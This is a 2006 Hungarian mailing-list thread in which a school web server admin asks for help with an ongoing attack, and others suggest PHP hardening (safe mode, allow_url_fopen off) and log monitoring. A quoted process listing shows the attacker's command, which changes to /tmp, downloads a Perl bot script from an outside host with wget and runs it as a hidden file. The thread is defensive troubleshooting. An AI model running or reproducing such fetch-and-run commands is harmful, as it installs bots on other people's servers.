Segitseg, tamadjak a webszerveremet
Fábián Zoltán
fz at szily.hu
2006. Okt. 5., Cs, 01:08:33 CEST
Ha a rendszer rendesen van konfigurálva és sulinetes router mögött vagy,
akkor igazából nézegesd a logokat, mást nem tudsz tenni, előbb-utóbb
továbbállnak és leállítják a BOT-okat. Ez maximum csak a sávszélességedet
veszi el.
Fabio
-----Original Message-----
From: techinfo-bounces at lista.sulinet.hu
[mailto:techinfo-bounces at lista.sulinet.hu] On Behalf Of
hollo.david at verebelyszki.hu
Sent: Wednesday, October 04, 2006 4:48 PM
To: Techinfo
Subject: Re: Segitseg, tamadjak a webszerveremet
Helo!
En ugy gondolom , hogy a php-t kapasbol safe modba kellene rakni, valoszinu
hogy beinclude-olnak egy path-t es ugy tudnak shellt futtatni..
php.ini be kicsit a biztonsagot emelni kellene, pl: allow_url_fopen -t
szinten off-ra tenni!
Ha mar szuletett megoldas bocsi, csak nem olvastam vegig a thread-et.
Udvozlettel:
Hollo David
> >sh-t inditanak? Huh, hat ez eleg csunyan hangzik -az eddigiekhez
> kepest-
> >ez azt jelenti, hogy mar bent vannak. Biztos vagy benne?
>
> Nem, nem vagyok. Nem vagyok egy Linux guru. A fősulin 1 évig tanultam
> Linuxot, azóta próbálom követni a változásokat, de három gyerekem is
> van mellette. Azért használom, mert
> a) Windows szerverekhez még kevesebbet értek
> b) (tegnapig) jobb ötletnek tűnt.
>
> Ami az sh-t illeti, amint első levelemben írtam:
>
> ps kimenete (részlet):
>
> www-data 2715 0.0 0.2 2476 1160 ? S 11:26 0:00 sh -c cd /tmp; wget
> http://cmgforum.net/botek.txt; mv botek.txt .sessx; perl .sessx; rem
> botek.txt.*; wget .... blablabla
>
> Elég egyértelmű, hogy mit akar csinálni, de már a /tmp-be sem tud bejutni.
> Az apache error.log-ja tele van a próbálkozásokkal (permission denied,
> file not exist stb.) Amit nem értek, és ezért nagyon zavar, az a sh -c
> része. A www-data user-nek a /bin/false a shell-je.
>
> _________________________________________
> FIRST MINUTE SÍELÉSI AJÁNLATOKNézd át az adriatica.net fantasztikus
> síajánlatait és foglalj könnyen, gyorsan, olcsóbban - már most!
> Részletekért klikk ide!
> _______________________________________________
> Techinfo mailing list
> Techinfo at lista.sulinet.hu
> http://lista.sulinet.hu/mailman/listinfo/techinfo
> Illemtan: http://support.bkf.hu/illemtan.html
> Ügyfélszolgálat FAQ: http://www.sulinet.hu/tart/cikk/sc/0/19789/1
>
_______________________________________________
Techinfo mailing list
Techinfo at lista.sulinet.hu
http://lista.sulinet.hu/mailman/listinfo/techinfo
Illemtan: http://support.bkf.hu/illemtan.html
Ügyfélszolgálat FAQ: http://www.sulinet.hu/tart/cikk/sc/0/19789/1
További információk a(z) Techinfo levelezőlistáról